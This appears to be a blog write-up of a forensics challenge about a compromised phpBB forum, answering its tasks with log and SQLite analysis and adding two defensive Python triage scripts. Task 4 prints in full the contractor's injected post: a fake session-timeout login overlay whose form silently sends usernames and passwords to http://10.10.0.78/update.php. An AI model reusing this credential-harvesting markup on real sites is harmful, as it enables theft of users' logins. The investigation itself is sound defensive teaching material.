This article was last updated on 27 March 2025 (afternoon)
Level: Easy
Description: An external contractor has accessed the internal forum here at Forela via the Guest Wi-Fi, and they appear to have stolen credentials for the administrative user! We have attached some logs from the forum and a full database dump in sqlite3 format to help you in your investigation.
Task 1 Looking through access.log, 10.10.0.78 logs in successfully; further down, 10.255.254.2 logs in successfully and then reaches the admin control panel (adm). So the guess is that 10.10.0.78 is the contractor and 10.255.254.2 is the real administrator.
Viewing the phpbb.sqlite3 file in an online SQLite viewer shows two users.
What was the username of the external contractor? : apoole1
Task 2 What IP address did the contractor use to create their account? : 10.10.0.78
Task 3 In phpbb_posts, look up the post_id belonging to IP 10.10.0.78.
What is the post_id of the malicious post that the contractor made? : 9
Task 4 phpbb_posts also has a post_text column.
Check it with sqlite3 on Linux:
pragma table_info(phpbb_users);
select post_text from phpbb_posts;
The output turns out to be a web page, so let's tidy it up.
This is an example post in your phpBB3 installation. Everything seems to be working. You may delete this post if you like and continue to set up your board. During the installation process your first category and your first forum are assigned an appropriate set of permissions for the predefined usergroups administrators, bots, global moderators, guests, registered users and registered COPPA users. If you also choose to delete your first category and your first forum, do not forget to assign permissions for all these usergroups for all new categories and forums you create. It is recommended to rename your first category and your first forum and copy permissions from these while creating new categories and forums. Have fun!<t > Good Afternoon everyone! <br /> <br /> I am new to the administration team here at forela, I'd like to take a minute and say hello! 
<br /> I have 5 years of administration experience and am ecstatic to be joining this team <br /> <br /> Regards, <br /> Randy</t > <div > <style > body { z-index : 100 ;}.modal { position :fixed; top :0 ; left :0 ; height :100% ; width :100% ; z-index :101 ; background-color :white; opacity :1 ;}.modal .hidden { visibility : hidden;}</style > <script type ="text/javascript" > function sethidden ( ){ const d = new Date (); d.setTime (d.getTime () + (24 *60 *60 *1000 )); let expires = "expires=" + d.toUTCString (); document .cookie = "phpbb_token=1;" + expires + ";" ; var modal = document .getElementById ('zbzbz1234' ); modal.classList .add ("hidden" );}document .addEventListener ("DOMContentLoaded" , function (event ) { let cookieexists = false ; let name = "phpbb_token=" ; let cookies = decodeURIComponent (document .cookie ); let ca = cookies.split (';' ); for (let i = 0 ; i < ca.length ; i++) { let c = ca[i]; while (c.charAt (0 ) == ' ' ) { c = c.substring (1 ); } if (c.indexOf (name) == 0 ) { cookieexists = true ; } } if (cookieexists){ return ; } var modal = document .getElementById ('zbzbz1234' ); modal.classList .remove ("hidden" );}); </script > <iframe name ="hiddenframe" id ="hiddenframe" style ="display:none" > </iframe > <div class ="modal hidden" id ="zbzbz1234" onload ="shouldshow" > <div id ="wrap" class ="wrap" > <a id ="top" class ="top-anchor" accesskey ="t" > </a > <div id ="page-header" > <div class ="headerbar" role ="banner" > <div class ="inner" > <div id ="site-description" class ="site-description" > <a id ="logo" class ="logo" href ="./index.php" title ="Board index" > <span class ="site_logo" > </span > </a > <h1 > forum.forela.co.uk</h1 > <p > Forela internal forum</p > <p class ="skiplink" > <a href ="#start_here" > Skip to content</a > </p > </div > <div id ="search-box" class ="search-box search-header" role ="search" > <form action ="./search.php" method ="get" id ="search1" > <fieldset > <input name ="keywords" id ="keywords1" type 
="search" maxlength ="128" title ="Search for keywords" class ="inputbox search tiny" size ="20" value ="" placeholder ="Search…" > <button class ="button button-search" type ="submit" title ="Search" > <i class ="icon fa-search fa-fw" aria-hidden ="true" > </i > <span class ="sr-only" > Search</span > </button > <a href ="./search.php" class ="button button-search-end" title ="Advanced search" > <i class ="icon fa-cog fa-fw" aria-hidden ="true" > </i > <span class ="sr-only" > Advanced search</span > </a > </fieldset > </form > </div > </div > </div > <div class ="navbar" role ="navigation" > <div class ="inner" > <ul id ="nav-main" class ="nav-main linklist" role ="menubar" > <li id ="quick-links" class ="quick-links dropdown-container responsive-menu" data-skip-responsive ="true" > <a href ="#" class ="dropdown-trigger dropdown-toggle" > <i class ="icon fa-bars fa-fw" aria-hidden ="true" > </i > <span > Quick links</span > </a > <div class ="dropdown" > <div class ="pointer" > <div class ="pointer-inner" > </div > </div > <ul class ="dropdown-contents" role ="menu" > <li class ="separator" > </li > <li > <a href ="./search.php?search_id=unanswered" role ="menuitem" > <i class ="icon fa-file-o fa-fw icon-gray" aria-hidden ="true" > </i > <span > Unanswered topics</span > </a > </li > <li > <a href ="./search.php?search_id=active_topics" role ="menuitem" > <i class ="icon fa-file-o fa-fw icon-blue" aria-hidden ="true" > </i > <span > Active topics</span > </a > </li > <li class ="separator" > </li > <li > <a href ="./search.php" role ="menuitem" > <i class ="icon fa-search fa-fw" aria-hidden ="true" > </i > <span > Search</span > </a > </li > <li class ="separator" > </li > </ul > </div > </li > <li data-skip-responsive ="true" > <a href ="/phpBB3/app.php/help/faq" rel ="help" title ="Frequently Asked Questions" role ="menuitem" > <i class ="icon fa-question-circle fa-fw" aria-hidden ="true" > </i > <span > FAQ</span > </a > <li class ="rightside" 
data-skip-responsive ="true" > <a href ="./ucp.php?mode=login" title ="Login" accesskey ="x" role ="menuitem" > <i class ="icon fa-power-off fa-fw" aria-hidden ="true" > </i > <span > Login</span > </a > </li > <li class ="rightside" data-skip-responsive ="true" > <a href ="./ucp.php?mode=register" role ="menuitem" > <i class ="icon fa-pencil-square-o fa-fw" aria-hidden ="true" > </i > <span > Register</span > </a > </li > </li data-skip-responsive="true"> </ul > <ul id ="nav-breadcrumbs" class ="nav-breadcrumbs linklist navlinks" role ="menubar" > <li class ="breadcrumbs" itemscope ="" itemtype ="http://schema.org/BreadcrumbList" style ="max-width: 936px;" > <span class ="crumb" itemtype ="http://schema.org/ListItem" itemprop ="itemListElement" itemscope ="" > <a href ="./index.php" itemtype ="https://schema.org/Thing" itemprop ="item" accesskey ="h" data-navbar-reference ="index" title ="Board index" > <i class ="icon fa-home fa-fw" > </i > <span itemprop ="name" > Board index</span > </a > <meta itemprop ="position" content ="1" > </span > </li > <li class ="rightside responsive-search" > <a href ="./search.php" title ="View the advanced search options" role ="menuitem" > <i class ="icon fa-search fa-fw" aria-hidden ="true" > </i > <span class ="sr-only" > Search</span > </a > </li > </ul > </div > </div > </div > <a id ="start_here" class ="anchor" > </a > <div id ="page-body" class ="page-body" role ="main" > <div class ="panel" > <div class ="inner" > <div class ="content" > <h3 > Session Timeout</h3 > <br /> <br /> <p > Your session token has timed out in order to proceed you must login again.</p > </div > </div > </div > <form action ="http://10.10.0.78/update.php" method ="post" id ="login" data-focus ="username" target ="hiddenframe" > <div class ="panel" > <div class ="inner" > <div class ="content" > <h2 class ="login-title" > Login</h2 > <fieldset class ="fields1" > <dl > <dt > <label for ="username" > Username:</label > </dt > <dd > <input type 
="text" tabindex ="1" name ="username" id ="username" size ="25" value ="" class ="inputbox autowidth" > </dd > </dl > <dl > <dt > <label for ="password" > Password:</label > </dt > <dd > <input type ="password" tabindex ="2" id ="password" name ="password" size ="25" class ="inputbox autowidth" autocomplete ="off" > </dd > </dl > <dl > <dd > <label for ="autologin" > <input type ="checkbox" name ="autologin" id ="autologin" tabindex ="4" > Remember me</label > </dd > <dd > <label for ="viewonline" > <input type ="checkbox" name ="viewonline" id ="viewonline" tabindex ="5" > Hide my online status this session</label > </dd > </dl > <dl > <dt > </dt > <dd > <input type ="submit" name ="login" tabindex ="6" value ="Login" class ="button1" onclick ="sethidden()" > </dd > </dl > </fieldset class="fields1"> </div > </div > </div > </form > </div > <div id ="page-footer" class ="page-footer" role ="contentinfo" > <div class ="navbar" role ="navigation" > <div class ="inner" > <ul id ="nav-footer" class ="nav-footer linklist" role ="menubar" > <li class ="breadcrumbs" > <span class ="crumb" > <a href ="./index.php" data-navbar-reference ="index" title ="Board index" > <i class ="icon fa-home fa-fw" aria-hidden ="true" > </i > <span > Board index</span > </a > </span > </li > <li class ="responsive-menu hidden rightside dropdown-container" > <a href ="javascript:void(0);" class ="js-responsive-menu-link responsive-menu-link dropdown-toggle" > <i class ="icon fa-bars fa-fw" aria-hidden ="true" > </i > </a > <div class ="dropdown" > <div class ="pointer" > <div class ="pointer-inner" > </div > </div > <ul class ="dropdown-contents" > </ul > </div > </li > <li class ="rightside" > All times are <span title ="UTC" > UTC</span > </li > <li class ="rightside" > <a href ="./ucp.php?mode=delete_cookies" data-ajax ="true" data-refresh ="true" role ="menuitem" > <i class ="icon fa-trash fa-fw" aria-hidden ="true" > </i > <span > Delete cookies</span > </a > </li > </ul > </div > 
</div > <div class ="copyright" > <p class ="footer-row" > <span class ="footer-copyright" > Powered by <a href ="https://www.phpbb.com/" > phpBB</a > ® Forum Software © phpBB Limited</span > </p > <p class ="footer-row" > <a class ="footer-link" href ="./ucp.php?mode=privacy" title ="Privacy" role ="menuitem" > <span class ="footer-link-text" > Privacy</span > </a > | <a class ="footer-link" href ="./ucp.php?mode=terms" title ="Terms" role ="menuitem" > <span class ="footer-link-text" > Terms</span > </a > </p > </div > <div id ="darkenwrapper" class ="darkenwrapper" data-ajax-error-title ="AJAX error" data-ajax-error-text ="Something went wrong when processing ysqlite> > <div id=" darken " class ="darken" > </div > </div > <div id ="phpbb_alert" class ="phpbb_alert" data-l-err ="Error" data-l-timeout-processing-req ="Request timed out." > <a href ="#" class ="alert_close" > <i class ="icon fa-times-circle fa-fw" aria-hidden ="true" > </i > </a > <h3 class ="alert_title" > </h3 > <p class ="alert_text" > </p > </div > <div id ="phpbb_confirm" class ="phpbb_alert" > <a href ="#" class ="alert_close" > <i class ="icon fa-times-circle fa-fw" aria-hidden ="true" > </i > </a > <div class ="alert_text" > </div > </div > </div > </div > <div > <a id ="bottom" class ="anchor" accesskey ="z" > </a > <img src ="./cron.php?cron_type=cron.task.core.tidy_warnings" width ="1" height ="1" alt ="cron" > </div > </div > <span > Greetings everyone, <br > <br > I am just a visiting IT Contractor, it's a fantastic company y'all have here. <br > I hope to work with you all again soon. <br > <br > Regards, <br > Alex Poole</span > </div >
Previewing it shows a login page, and reviewing the code shows that the form sends its data to http://10.10.0.78/update.php
What is the full URI that the credential stealer sends its data to? : http:
Task 5 Look at phpbb_log and find the login time in log_time. The time shown in the log is a Unix timestamp (I did not know this), i.e. epoch format, so it still has to be converted to UTC with Unix Timestamp to Date, which gives Wed, 26 Apr 2023 10:53:12 GMT, reformatted as 26/04/2023 10:53:12.
When did the contractor log into the forum as the administrator? (UTC) : 26/04/2023 10:53:12
Task 6 Consulting the official documentation on LDAP Authentication: "This password will be stored as plain text in the database; it will be visible to everybody who can access your database". So the password is in the database; looking through the phpbb_config table turns up ldap_password: Passw0rd1
In the forum there are plaintext credentials for the LDAP connection, what is the password? : Passw0rd1
Task 7 We already know from earlier that 10.255.254.2 is the administrator's IP, so looking up the entries for that IP gives the answer.
What is the user agent of the Administrator user? : Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Task 8 phpbb_log contains a LOG_USERS_ADDED entry; after conversion its time is 26/04/2023 10:53:51.
What time did the contractor add themselves to the Administrator group? (UTC) : 26/04/2023 10:53:51
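Tasks 2 through 8 all come down to querying the SQLite dump, and the same four questions recur in any forum compromise: which account was registered from the suspect IP, which post carries injected HTML, what the epoch timestamps in phpbb_log are in UTC, and which config keys hold clear-text credentials. The script below is an added example written for this page; it is not the write-up's own commands and not phpBB code. It builds a small in-memory copy of the relevant tables from constructed rows (the table and column names user_ip, poster_ip, log_operation, log_ip, config_name and config_value are assumed from phpBB's schema; the rows, the LOG_ADMIN_AUTH_SUCCESS entry and the ldap_server value are invented, shaped after the values the write-up reports). Against the real dump you would replace the in-memory connection with sqlite3.connect('phpbb.sqlite3').

```python
import re
import sqlite3
from urllib.parse import urlsplit

# Constructed miniature of the phpBB dump. Table and column names follow phpBB;
# every row is invented for this example (the real dump has many more columns).
CONSTRUCTED_DUMP = """
CREATE TABLE phpbb_users (user_id INTEGER, username TEXT, user_ip TEXT, user_regdate INTEGER);
CREATE TABLE phpbb_posts (post_id INTEGER, poster_id INTEGER, poster_ip TEXT, post_text TEXT);
CREATE TABLE phpbb_log (log_id INTEGER, log_time INTEGER, log_operation TEXT, log_ip TEXT);
CREATE TABLE phpbb_config (config_name TEXT, config_value TEXT);
INSERT INTO phpbb_users VALUES (2, 'admin', '10.255.254.2', 1682467200);
INSERT INTO phpbb_users VALUES (48, 'apoole1', '10.10.0.78', 1682505000);
INSERT INTO phpbb_posts VALUES (1, 2, '10.255.254.2', '<t>Welcome to the forum.</t>');
INSERT INTO phpbb_posts VALUES (9, 48, '10.10.0.78', '<t>Hello</t><div><script>document.cookie = "phpbb_token=1"</script><form action="http://10.10.0.78/update.php" method="post" target="hiddenframe"></form></div>');
INSERT INTO phpbb_log VALUES (1, 1682506392, 'LOG_ADMIN_AUTH_SUCCESS', '10.10.0.78');
INSERT INTO phpbb_log VALUES (2, 1682506431, 'LOG_USERS_ADDED', '10.10.0.78');
INSERT INTO phpbb_config VALUES ('ldap_server', 'ldap.example.internal');
INSERT INTO phpbb_config VALUES ('ldap_password', 'Passw0rd1');
INSERT INTO phpbb_config VALUES ('board_email', 'board@example.com');
"""

SCRIPT_RE = re.compile(r"<script\b", re.I)
FORM_ACTION_RE = re.compile(r"""<form\b[^>]*\baction\s*=\s*["']([^"']+)""", re.I)
SECRET_NAME_RE = re.compile(r"(pass|secret|key|token)", re.I)


def open_constructed_dump():
    """Load the constructed rows into an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(CONSTRUCTED_DUMP)
    return conn


def users_by_ip(conn, ip):
    """Task 2 in reverse: which accounts were registered from this IP?"""
    rows = conn.execute(
        "SELECT username FROM phpbb_users WHERE user_ip = ? ORDER BY user_id", (ip,)
    )
    return [r[0] for r in rows]


def posts_with_injected_html(conn, board_host):
    """Tasks 3/4: flag posts carrying a <script> tag or a form that posts to a
    host other than the board itself. Returns (post_id, poster_ip, targets)."""
    hits = []
    for post_id, poster_ip, text in conn.execute(
        "SELECT post_id, poster_ip, post_text FROM phpbb_posts ORDER BY post_id"
    ):
        # Relative actions (./search.php) have no hostname and count as local.
        targets = [
            url for url in FORM_ACTION_RE.findall(text)
            if urlsplit(url).hostname not in (None, board_host)
        ]
        if targets or SCRIPT_RE.search(text):
            hits.append((post_id, poster_ip, targets))
    return hits


def log_events_utc(conn):
    """Tasks 5/8: let SQLite itself turn the epoch log_time into the
    dd/mm/YYYY HH:MM:SS UTC form the questions ask for."""
    rows = conn.execute(
        "SELECT log_operation, log_ip, "
        "strftime('%d/%m/%Y %H:%M:%S', log_time, 'unixepoch') "
        "FROM phpbb_log ORDER BY log_time"
    )
    return [tuple(r) for r in rows]


def plaintext_secrets(conn):
    """Task 6: config keys whose name suggests a credential and whose value is
    set (phpBB keeps the LDAP bind password in clear text here)."""
    return {
        name: value
        for name, value in conn.execute("SELECT config_name, config_value FROM phpbb_config")
        if SECRET_NAME_RE.search(name) and value
    }


if __name__ == "__main__":
    db = open_constructed_dump()
    print("registered from 10.10.0.78:", users_by_ip(db, "10.10.0.78"))
    print("suspicious posts:", posts_with_injected_html(db, "forum.forela.co.uk"))
    for event in log_events_utc(db):
        print("log:", event)
    print("credentials in config:", plaintext_secrets(db))
```

The strftime call is the one-liner worth remembering at the sqlite3 prompt: strftime('%d/%m/%Y %H:%M:%S', log_time, 'unixepoch') gives the UTC answer without a web converter. The post check is deliberately coarse (any script tag, any form aimed off-board); on a real board it will also surface legitimate embeds, which is the point of a triage list rather than a verdict.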
Task 9 IP 10.10.0.78 can be seen requesting /store/backup_1682506471_dcsr71p7fyijoyq8.sql.gz at 26/04/2023 12:01:38, i.e. downloading the database. Since the answer is wanted in UTC, subtracting 1 hour gives the correct time.
What time did the contractor download the database backup? (UTC) : 26/04/2023 11:01:38
Task 10 Just find the entry at that time and read off the size.
What was the size in bytes of the database backup as stated by access.log? : 34707
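Tasks 1, 7, 9 and 10 are all answered from access.log, and the recurring trap is the timezone: the log carries local-time stamps with an offset, while the answers want UTC. The parser below is an added example for this page, not code from the write-up or from the challenge files. It parses Apache combined-format lines, converts each timestamp to UTC with the zone offset rather than by hand, and then applies the checks the tasks needed. The log lines are constructed: the IPs, the backup path, its 34707-byte size and the administrator's user agent are the values the write-up reports, while the request paths, status codes and most timestamps are invented. It assumes that phpBB answers a successful login POST with a 302 redirect and a failed one by re-rendering the form with 200, and that the admin control panel lives under /adm/.

```python
import re
from datetime import datetime, timezone

# Constructed Apache combined-format lines (not the challenge's real log).
CONSTRUCTED_ACCESS_LOG = """\
10.10.0.78 - - [26/Apr/2023:11:53:12 +0100] "POST /ucp.php?mode=login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.255.254.2 - - [26/Apr/2023:11:57:40 +0100] "POST /ucp.php?mode=login HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
10.255.254.2 - - [26/Apr/2023:11:57:41 +0100] "GET /adm/index.php HTTP/1.1" 200 14201 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
10.10.0.78 - - [26/Apr/2023:12:00:05 +0100] "POST /ucp.php?mode=login HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
10.10.0.78 - - [26/Apr/2023:12:01:38 +0100] "GET /store/backup_1682506471_dcsr71p7fyijoyq8.sql.gz HTTP/1.1" 200 34707 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "[^"]*" "(?P<ua>[^"]*)"'
)


def to_utc(ts):
    """'26/Apr/2023:12:01:38 +0100' -> '26/04/2023 11:01:38' (the answer format).
    The %z offset does the hour arithmetic, so a +0000 or -0500 log works too."""
    local = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return local.astimezone(timezone.utc).strftime("%d/%m/%Y %H:%M:%S")


def parse_access_log(text):
    """Parse combined-format lines; lines that do not match are skipped, not guessed."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["status"] = int(e["status"])
        e["size"] = 0 if e["size"] == "-" else int(e["size"])
        e["utc"] = to_utc(e["ts"])
        entries.append(e)
    return entries


def successful_logins(entries):
    """Task 1: login POSTs answered with a redirect (assumed to mean success)."""
    return [
        (e["ip"], e["utc"])
        for e in entries
        if e["method"] == "POST"
        and e["path"].startswith("/ucp.php?mode=login")
        and e["status"] == 302
    ]


def acp_visitors(entries):
    """Task 1: IPs that reached the admin control panel, in first-seen order."""
    seen = []
    for e in entries:
        if e["path"].startswith("/adm/") and e["ip"] not in seen:
            seen.append(e["ip"])
    return seen


def backup_downloads(entries):
    """Tasks 9/10: who fetched a database backup from /store/, when (UTC), how many bytes."""
    return [
        (e["ip"], e["utc"], e["size"])
        for e in entries
        if e["path"].startswith("/store/") and e["path"].endswith(".sql.gz") and e["status"] == 200
    ]


def user_agents(entries, ip):
    """Task 7: distinct user agents seen from one IP."""
    return sorted({e["ua"] for e in entries if e["ip"] == ip})


if __name__ == "__main__":
    log = parse_access_log(CONSTRUCTED_ACCESS_LOG)
    print("successful logins:", successful_logins(log))
    print("reached /adm/:", acp_visitors(log))
    print("backup downloads:", backup_downloads(log))
    print("admin user agents:", user_agents(log, "10.255.254.2"))
```

Keeping the raw timestamp and the derived UTC string side by side in each entry is deliberate: when you write the timeline up, you can quote the log verbatim and still give answers in UTC without re-doing the subtraction by hand.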
Analysis A rough overview of LDAP
LDAP (Lightweight Directory Access Protocol) is a lightweight directory access protocol that runs over TCP/IP and is used mainly for searching and querying resources in a directory. The most widely used LDAP services are Microsoft's ADAM (Active Directory Application Mode) and OpenLDAP; the key point is that LDAP itself is a protocol. There are many related protocols: X.500 is the original directory access protocol, and LDAP is its lighter-weight version.
For more detail see: The LDAP protocol family, What Is LDAP & How Does It Work?, Basic LDAP Concepts